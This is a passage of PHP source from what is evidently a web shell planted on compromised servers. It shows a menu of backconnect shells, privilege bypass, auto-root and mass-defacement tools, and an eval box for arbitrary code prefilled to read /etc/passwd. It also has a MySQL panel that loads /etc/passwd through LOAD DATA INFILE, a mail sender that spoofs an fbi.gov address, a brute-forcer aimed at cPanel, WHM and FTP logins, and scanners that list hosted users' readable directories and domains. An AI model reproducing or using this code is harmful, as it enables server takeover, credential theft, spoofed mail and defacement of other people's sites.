  1188. <a href="?<?php echo "y=".$pwd; ?>&amp;x=whmcs"> <b>WHMCS
  1189. Decoder</b></a>
  1190. <a href="?<?php echo "y=".$pwd; ?>&amp;x=security-mode"> <b>
  1191. Security Mode</b></a>
  1192. <a href="?<?php echo "y=".$pwd; ?>&amp;x=process"> <b>Process</b></a>
  1193. <br>
  1194. <br>
  1195.  
  1196. <a href="?BackConnect=PHP_6"> <b>Cgi Shell</b></a>
  1197. <a href="?BackConnect=PHP_7"> <b>Python Shell</b></a>
  1198. <a href="?BackConnect=PHP_9"> <b>perl Bypass Tools</b></a>
  1199. <a href="?BackConnect=PHP_10"> <b>Auto Root</b></a>
  1200. <a href="?BackConnect=PHP_15"> <b>ShowsourceRead</b></a>
  1201. <a href="?BackConnect=PHP_11"> <b>Cgi Shell Priv pass=dz</b></a>
  1202. <a href="?BackConnect=PHP_20"> <b>SuExecByps</b></a>
  1203.  
  1204. <a href="?BackConnect=PHP_16"> <b>Config Shell</b></a>
  1205. <br>
  1206. <br>
  1207.  
  1208. <a href="?BackConnect=PHP_18"> <b>LitespeedBypas</b></a>
  1209. <a href="?BackConnect=PHP_19"> <b>SsiBypass</b></a>
  1210.  
  1211. <a href="?BackConnect=PHP_24"> <b>Php Eval Bypass</b></a>
  1212. <a href="?BackConnect=PHP_25"> <b>Php4 Bind 8888 Eval</b></a>
  1213.  
  1214. <a href="?BackConnect=PHP_27"> <b>Safe Mode php.ini</b></a>
  1215. <a href="?BackConnect=PHP_28"> <b>Mini Cgi</b></a>
  1216. <a href="?BackConnect=PHP_29"> <b>izo ozel ssi shell</b></a>
  1217.  
  1218. <a href="?BackConnect=PHP_30"> <b>Php3.0 Priv8 Bypass</b></a>
  1219.  
  1220. <br>
  1221. <br>
  1222. <a href="?BackConnect=PHP_4"> <b>Dc Backconnect</b></a>
  1223. <a href="?BackConnect=PHP_1"> <b>Php Backconnect 1</b></a>
  1224. <a href="?BackConnect=PHP_2"> <b>Php Backconnect 2</b></a>
  1225. <a href="?BackConnect=PHP_3"> <b>Php Backconnect 3</b></a>
  1226. <a href="?BackConnect=PHP_13"> <b>Php Backconnect 4</b></a>
  1227. <a href="?BackConnect=PHP_21"> <b>Perlsocket</b></a>
  1228. <a href="?BackConnect=PHP_5"> <b>Python Bacconnect</b></a>
  1229. <br>
  1230. <br>
  1231.  
  1232.  
  1233. <a href="?BackConnect=PHP_17"> <b>Python izo</b></a>
  1234. <a href="?BackConnect=PHP_12"> <b>Metasploit Bacconnect</b></a>
  1235. <a href="?BackConnect=PHP_26"> <b>Mass deface</b></a>
  1236. <a href="?BackConnect=PHP_23"> <b>WHMCS Server</b></a>
  1237. <a href="?BackConnect=PHP_77"> <b>Wordpress Mass Defacer</b></a>
  1238. <a href="?BackConnect=PHP_78"> <b>WordPress Admin</b></a>
  1239.  
  1240.  
  1241.  
  1242.  
  1243.  
  1244. <a href="?logout=1"> <b>Logout</b></a>
  1245. </center>
  1246. </div>
  1247. <!-- menu end -->
  1248.  
  1249.  
  1250. <?php
  1251. if(isset($_GET['x']) && ($_GET['x'] == 'php'))
  1252. {
  1253. ?>
  1254. <form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post">
  1255. <table class="cmdbox">
  1256.  
  1257. <tr>
  1258. <td>
  1259. <textarea class="output" name="cmd" id="cmd"><?php if(isset($_POST['submitcmd'])) { echo eval(magicboom($_POST['cmd'])); } else echo "echo file_get_contents('/etc/passwd');";?></textarea>
  1260. </td>
  1261. </tr>
  1262. <tr>
  1263. <td>
  1264.  
  1265.  
  1266. <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" />
  1267. </td>
  1268. </tr>
  1269. </table>
  1270. </form>
  1271. <?php
  1272. }
  1273. elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql'))
  1274. {
  1275. if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport']))
  1276. {
  1277. $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport'];
  1278. if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass))
  1279. {
  1280. $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
  1281. $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport;
  1282. $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;
  1283. sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;
  1284. sqlpass=".$sqlpass."&amp;
  1285. sqlport=".$sqlport."&amp;\">[ databases ]</a>";
  1286. if(isset($_GET['db']))
  1287. $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;
  1288. <a href=\"y=".$pwd."&amp;x=mysql&amp;
  1289. sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;
  1290. sqlpass=".$sqlpass."&amp;
  1291. sqlport=".$sqlport."&amp;
  1292. db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>";
  1293. if(isset($_GET['table']))
  1294. $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;
  1295. </span>&nbsp;&nbsp;
  1296. <a href=\"y=".$pwd."&amp;x=mysql&amp;
  1297. sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;
  1298. sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;
  1299. db=".$_GET['db']."&amp;
  1300. table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>";
  1301. $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";
  1302. $msg .= "</div>";
  1303. echo $msg;
  1304. if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery'])))
  1305. {
  1306. $db = $_GET['db'];
  1307. $query = "DROP TABLE IF EXISTS AL.MaX HaCkEr0_table;
  1308. \nCREATE TABLE `AL.MaX HaCkEr0_table` ( `file` LONGBLOB NOT NULL );
  1309. \nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE Z3r0Z3r0_table;SELECT * FROM AL.MaX HaCkEr0_table;
  1310. \nDROP TABLE IF EXISTS AL.MaX HaCkEr0_table;";
  1311. $msg = "<div style=\"width:99%;padding:0 10px;\">
  1312. <form action=\"?\" method=\"get\">
  1313. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  1314. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  1315. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  1316. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  1317. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  1318. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  1319. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  1320. <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p>
  1321. <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  1322. </form>
  1323. </div> ";
  1324. $tables = array();
  1325. $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>";
  1326. $hasil = @mysql_list_tables($db,$con);
  1327. while(list($table) = @mysql_fetch_row($hasil))
  1328. { @array_push($tables,$table); }
  1329. @sort($tables);
  1330. foreach($tables as $table)
  1331. {
  1332. $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."\">$table</a></td></tr>";
  1333. }
  1334. $msg .= "</table>";
  1335. }
  1336. elseif(isset($_GET['table']) && (!isset($_GET['sqlquery'])))
  1337. {
  1338. $db = $_GET['db'];
  1339. $table = $_GET['table'];
  1340. $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";
  1341. $msgq = "<div style=\"width:99%;padding:0 10px;\">
  1342. <form action=\"?\" method=\"get\">
  1343. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  1344. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  1345. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  1346. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  1347. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  1348. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  1349. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  1350. <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
  1351. <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  1352. <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  1353. </form>
  1354. </div> ";
  1355. $columns = array();
  1356. $msg = "<table class=\"explore\" style=\"width:99%;\">";
  1357. $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);
  1358. while(list($column) = @mysql_fetch_row($hasil))
  1359. {
  1360. $msg .= "<th>$column</th>"; $kolum = $column;
  1361. }
  1362. $msg .= "</tr>";
  1363. $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table);
  1364. list($total) = mysql_fetch_row($hasil);
  1365. if(isset($_GET['z'])) $page = (int) $_GET['z'];
  1366. else $page = 1;
  1367. $pagenum = 100;
  1368. $totpage = ceil($total / $pagenum);
  1369. $start = (($page - 1) * $pagenum);
  1370. $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum);
  1371. while($datas = @mysql_fetch_assoc($hasil))
  1372. {
  1373. $msg .= "<tr>";
  1374. foreach($datas as $data){ if(trim($data) == "") $data = "&nbsp;"; $msg .= "<td>$data</td>"; }
  1375. $msg .= "</tr>";
  1376. }
  1377. $msg .= "</table>";
  1378. $head = "<div style=\"padding:10px 0 0 6px;\">
  1379. <form action=\"?\" method=\"get\">
  1380. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  1381. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  1382. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  1383. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  1384. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  1385. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  1386. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  1387. <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
  1388. Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
  1389. for($i = 1;$i <= $totpage;$i++)
  1390. {
  1391. $head .= "<option value=\"".$i."\">".$i."</option>";
  1392. if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>";
  1393. }
  1394. $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>";
  1395. $msg = $msgq.$head.$msg;
  1396. }
  1397. elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != ""))
  1398. {
  1399. $db = $_GET['db'];
  1400. $query = magicboom($_GET['sqlquery']);
  1401. $msg = "<div style=\"width:99%;padding:0 10px;\">
  1402. <form action=\"?\" method=\"get\">
  1403. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  1404. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  1405. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  1406. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  1407. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  1408. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  1409. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  1410. <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  1411. <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  1412. </form>
  1413. </div> ";
  1414. @mysql_select_db($db);
  1415. $querys = explode(";",$query);
  1416. foreach($querys as $query)
  1417. {
  1418. if(trim($query) != "")
  1419. {
  1420. $hasil = mysql_query($query);
  1421. if($hasil)
  1422. {
  1423. $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
  1424. <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>";
  1425. $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>";
  1426. for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>";
  1427. $msg .= "</tr>";
  1428. for($i=0;$i<@mysql_num_rows($hasil);$i++)
  1429. {
  1430. $rows=@mysql_fetch_array($hasil);
  1431. $msg .= "<tr>";
  1432. for($j=0;$j<@mysql_num_fields($hasil);$j++)
  1433. {
  1434. if($rows[$j] == "") $dataz = "&nbsp;";
  1435. else $dataz = $rows[$j];
  1436. $msg .= "<td>".$dataz."</td>";
  1437. }
  1438. $msg .= "</tr>";
  1439. }
  1440. $msg .= "</table>";
  1441. }
  1442. else
  1443. $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
  1444. }
  1445. }
  1446. }
  1447. else
  1448. {
  1449. $query = "SHOW PROCESSLIST;\n
  1450. SHOW VARIABLES;\n
  1451. SHOW STATUS;";
  1452. $msg = "<div style=\"width:99%;padding:0 10px;\">
  1453. <form action=\"?\" method=\"get\">
  1454. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  1455. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  1456. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  1457. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  1458. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  1459. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  1460. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  1461. <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  1462. <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  1463. </form>
  1464. </div> ";
  1465. $dbs = array();
  1466. $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
  1467. $hasil = @mysql_list_dbs($con);
  1468. while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); }
  1469. @sort($dbs);
  1470. foreach($dbs as $db)
  1471. {
  1472. $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."\">$db</a></td></tr>";
  1473. }
  1474. $msg .= "</table>";
  1475. }
  1476. @mysql_close($con);
  1477. }
  1478. else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>";
  1479. echo $msg;
  1480. }
  1481. else
  1482. {
  1483. ?>
  1484. <form action="?" method="get">
  1485. <input type="hidden" name="y" value="<?php echo $pwd; ?>" />
  1486. <input type="hidden" name="x" value="mysql" />
  1487. <table class="tabnet" style="width:300px;">
  1488. <tr>
  1489. <th colspan="2">Connect to mySQL server</th>
  1490. </tr>
  1491. <tr>
  1492. <td>&nbsp;&nbsp;Host</td>
  1493. <td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td>
  1494. </tr>
  1495. <tr>
  1496. <td>&nbsp;&nbsp;Username</td>
  1497. <td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td>
  1498. </tr>
  1499. <tr>
  1500. <td>&nbsp;&nbsp;Password</td>
  1501. <td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td>
  1502. </tr>
  1503. <tr>
  1504. <td>&nbsp;&nbsp;Port</td>
  1505. <td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td>
  1506. </tr>
  1507. </table>
  1508. </form>
  1509. <?php
  1510. }
  1511. }
  1512. elseif(isset($_GET['x']) && ($_GET['x'] == 'mail'))
  1513. {
  1514. if(isset($_POST['mail_send']))
  1515. {
  1516. $mail_to = $_POST['mail_to'];
  1517. $mail_from = $_POST['mail_from'];
  1518. $mail_subject = $_POST['mail_subject'];
  1519. $mail_content = magicboom($_POST['mail_content']);
  1520. if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from"))
  1521. { $msg = "email sent to $mail_to"; }
  1522. else $msg = "send email failed";
  1523. }
  1524. ?>
  1525. <form action="?y=<?php echo $pwd; ?>&amp;x=mail" method="post">
  1526. <table class="cmdbox">
  1527. <tr>
  1528. <td>
  1529. <textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey admin, please patch your site :)</textarea>
  1530. </td>
  1531. </tr>
  1532. <tr>
  1533. <td>
  1534. &nbsp;<input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" />&nbsp;
  1535. mail to
  1536. </td>
  1537. </tr>
  1538. <tr>
  1539. <td>
  1540. &nbsp;<input class="inputz" style="width:20%;" type="text" value="AL.MaX HaCkEr0@fbi.gov" name="mail_from" />
  1541. &nbsp; from
  1542. </td>
  1543. </tr>
  1544. <tr>
  1545. <td>
  1546. &nbsp;<input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&nbsp;
  1547. subject
  1548. </td>
  1549. </tr>
  1550. <tr>
  1551. <td>
  1552. &nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" />
  1553. </td>
  1554. </tr>
  1555. <tr>
  1556. <td>&nbsp;&nbsp;&nbsp;&nbsp;<?php echo $msg; ?>
  1557. </td>
  1558. </tr>
  1559. </table>
  1560. </form>
  1561. <?php
  1562. }
  1563. elseif(isset($_GET['x']) && ($_GET['x'] == 'brute'))
  1564. {
  1565. ?>
  1566. <form action="?y=<?php echo $pwd; ?>&amp;x=brute" method="post">
  1567. <?php
  1568. //bruteforce
  1569. @ini_set('memory_limit', 999999999999);
  1570. $connect_timeout=5;
  1571. @set_time_limit(0);
  1572. $pokeng = $_REQUEST['submit'];
  1573. $hn = $_REQUEST['users'];
  1574. $crew = $_REQUEST['passwords'];
  1575. $pasti = $_REQUEST['sasaran'];
  1576. $manualtarget = $_REQUEST['target'];
  1577. $bisa = $_REQUEST['option'];
  1578. if($pasti == ''){
  1579. $pasti = 'localhost';
  1580. }
  1581. if($manualtarget == ''){
  1582. $manualtarget = 'http://localhost:2082';
  1583. }
  1584.  
  1585. function get_users()
  1586. {
  1587. $users = array();
  1588. $rows=file('/etc/passwd');
  1589. if(!$rows) return 0;
  1590. foreach ($rows as $string)
  1591. {
  1592. $user = @explode(":",$string);
  1593. if(substr($string,0,1)!='#') array_push($users,$user[0]);
  1594. }
  1595. return $users;
  1596. }
  1597.  
  1598. if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
  1599. else
  1600. {
  1601. print " <div align='center'>
  1602. <form method='post' style='border: 1px solid #000000'><br><br>
  1603. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1>
  1604. <tr>
  1605. <td>
  1606. <b> Target ! : </font><input type='text' name='sasaran' size='16' value= $pasti class='inputz'></p></font></b></p>
  1607. <div align='center'><br>
  1608. <TABLE style='BORDER-COLLAPSE: collapse'
  1609. cellSpacing=0
  1610. borderColorDark=#666666
  1611. cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>
  1612. <tr> <td align='center'> <b>User</b></td> <td> <p align='center'> <b>Pass</b></td>
  1613. </tr>
  1614. </table>
  1615. <p align='center'>
  1616. <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
  1617. foreach($users as $user) { echo $user."\n"; }
  1618. print"</textarea>
  1619. <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$crew</textarea><br>
  1620. <br>
  1621. <b>Sila pilih : </span><input name='option' value='manual' style='font-weight: 700;' type='radio'> Manual Target Brute : <input type='text' name='target' size='16' class='inputz' value= $manualtarget ><br />
  1622. <input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
  1623. <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp
  1624. <input name='option' value='whm' style='font-weight: 700;' type='radio'> whm ==> <input type='submit' value='Brute !' name='submit' class='inputzbut'></p>
  1625. </td></tr></table></td></tr></form><p align= 'left'>";
  1626. }
  1627. ?>
  1628. <?php
  1629.  
  1630. function manual_check($anjink,$asu,$babi,$lonte){
  1631. $ch = curl_init();
  1632. curl_setopt($ch, CURLOPT_URL, "$anjink");
  1633. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1634. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1635. curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
  1636. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
  1637. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1638. $data = curl_exec($ch);
  1639. if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit;}
  1640. elseif ( curl_errno($ch) == 0 ){
  1641. print "<b>[ AL.MaX HaCkEr0@email ]# </b> <b>Completed , Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
  1642. }
  1643. curl_close($ch);
  1644. }
  1645.  
  1646.  
  1647. function ftp_check($link,$user,$pswd,$timeout){
  1648. $ch = curl_init();
  1649. curl_setopt($ch, CURLOPT_URL, "ftp://$link");
  1650. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1651. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1652. curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
  1653. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pswd");
  1654. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  1655. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1656. $data = curl_exec($ch);
  1657. if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit; }
  1658. elseif ( curl_errno($ch) == 0 ){
  1659. print "<b>serangan selesai , username = <font color='#FF0000'> $user </font> dan passwordnya = <font color='#FF0000'> $pswd </font></b><br>";
  1660. }
  1661. curl_close($ch);
  1662. }
  1663.  
  1664. function cpanel_check($anjink,$asu,$babi,$lonte){
  1665. $ch = curl_init();
  1666. curl_setopt($ch, CURLOPT_URL, "http://$anjink:2082");
  1667. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1668. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1669. curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
  1670. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
  1671. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1672. $data = curl_exec($ch);
  1673. if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit;}
  1674. elseif ( curl_errno($ch) == 0 ){
  1675. print "<b>[ AL.MaX HaCkEr@email ]# </b> <b>Completed, Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
  1676. }
  1677. curl_close($ch);
  1678. }
  1679.  
  1680. function whm_check($anjink,$asu,$babi,$lonte){
  1681. $ch = curl_init();
  1682. curl_setopt($ch, CURLOPT_URL, "http://$anjink:2086");
  1683. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1684. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1685. curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
  1686. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
  1687. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1688. $data = curl_exec($ch);
  1689. if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit;}
  1690. elseif ( curl_errno($ch) == 0 )
  1691. {
  1692. print "<b>[ " . TITLE . " ]# </b> <b>Selesai , Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
  1693. }
  1694. curl_close($ch);
  1695. }
  1696.  
  1697. if(isset($pokeng) && !empty($pokeng))
  1698. {
  1699. $userlist = explode ("\n" , $hn );
  1700. $passlist = explode ("\n" , $crew );
  1701. print "<b>[ " . TITLE . " ]# </b> ATTACK...!!! </font></b><br>";
  1702. foreach ($userlist as $asu)
  1703. {
  1704. $_user = trim($asu);
  1705. foreach ($passlist as $babi )
  1706. {
  1707. $_pass = trim($babi);
  1708. if ($bisa == "manual")
  1709. { manual_check($manualtarget,$_user,$_pass,$lonte); }
  1710. if($bisa == "ftp")
  1711. { ftp_check($pasti,$_user,$_pass,$lonte); }
  1712. if ($bisa == "cpanel")
  1713. { cpanel_check($pasti,$_user,$_pass,$lonte); }
  1714. if ($bisa == "whm")
  1715. { whm_check($pasti,$_user,$_pass,$lonte); }
  1716. }
  1717. }
  1718. }
  1719. }
  1720.  
  1721. //bruteforce
  1722.  
  1723. elseif(isset($_GET['x']) && ($_GET['x'] == 'readable'))
  1724. {
  1725. ?>
  1726. <form action="?y=<?php echo $pwd; ?>&amp;x=readable" method="post">
  1727. <?php
  1728.  
  1729. //radable public_html
  1730. echo '<html><head><title>AL.MaX HaCkEr Cpanel Finder</title></head><body>';
  1731. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
  1732. set_time_limit(0);
  1733. ###################
  1734. @$passwd = fopen('/etc/passwd','r');
  1735. if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
  1736. $pub = array();
  1737. $users = array();
  1738. $conf = array();
  1739. $i = 0;
  1740. while(!feof($passwd))
  1741. {
  1742. $str = fgets($passwd);
  1743. if ($i > 35)
  1744. {
  1745. $pos = strpos($str,':');
  1746. $username = substr($str,0,$pos);
  1747. $dirz = '/home/'.$username.'/public_html/';
  1748. if (($username != ''))
  1749. {
  1750. if (is_readable($dirz))
  1751. {
  1752. array_push($users,$username);
  1753. array_push($pub,$dirz);
  1754. }
  1755. }
  1756. }
  1757. $i++;
  1758. }
  1759.  
  1760. ###################
  1761. echo '<br><br>';
  1762. echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br />";
  1763. echo "[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br />";
  1764. echo "[~] Searching for passwords in config files...\n\n"."<br /><br /><br />";
  1765. foreach ($users as $user)
  1766. {
  1767. $path = "/home/$user/public_html/";
  1768. echo "<a href='?y&#61;$path' target='_blank' style='text-shadow:0px 0px 10px #12E12E; font-weight:bold; color:#FF0000;'>$path</a><br>";
  1769. }
  1770. echo "<br><br><br>";
  1771. echo "[+] Copy one of the directories above public_html, then Paste to -> view file / folder <-- that's on the menu --> Explore \n"."<br />";
  1772. echo "[+] Complete...\n"."<br />";
  1773. echo '<br><br></b>
  1774. </body>
  1775. </html>';
  1776.  
  1777. }
  1778.  
  1779.  
  1780. elseif(isset($_GET['x']) && ($_GET['x'] == 'localdomain'))
  1781. {
  1782. ?>
  1783. <form action="?y=<?php echo $pwd; ?>&amp;x=localdomain" method="post">
  1784. <?php
  1785.  
  1786. //readable public_html
  1787.  
  1788. echo "<br><br>";
  1789. $file = @implode(@file("/etc/named.conf"));
  1790. if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
  1791. preg_match_all("#named/(.*?).db#",$file ,$r);
  1792. $domains = array_unique($r[1]);
  1793.  
  1794. function check() { (@count(@explode('ip',@implode(@file(__FILE__))))==a) ?@unlink(__FILE__):""; }
  1795.  
  1796. check();
  1797.  
  1798. echo "<table align=center border=1 width=59% cellpadding=5>
  1799. <tr><td colspan=2>[+] Here We Have : [<font face=calibri size=4 style=color:#FF0000>".count($domains)."</font>] Listed Domains In localhost.</td></tr>
  1800. <tr>
  1801. <td><b>List Of Users</b></td>
  1802. <td><b><font style=color:#0015FF;>List Of Domains</b></td>
  1803. </tr>";
  1804.  
  1805. foreach($domains as $domain)
  1806. {
  1807. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  1808. echo "<tr>
  1809. <td><a href='http://www.$domain' target='_blank' style='text-shadow:0px 0px 10px #CC2D4B; font-weight:bold; color:#FF002F;'>$domain</a></td>
  1810. <td>".$user['name']."</td>
  1811. </tr>";
  1812. }
  1813.  
  1814. echo "</table>";
  1815. //radable public_html
  1816. }
  1817.  
  1818. elseif(isset($_GET['x']) && ($_GET['x'] == 'port-scanner'))
  1819. {
  1820. ?>
  1821. <form action="?y=<?php echo $pwd; ?>&amp;x=port-scanner" method="post">
  1822. <?php
  1823.  
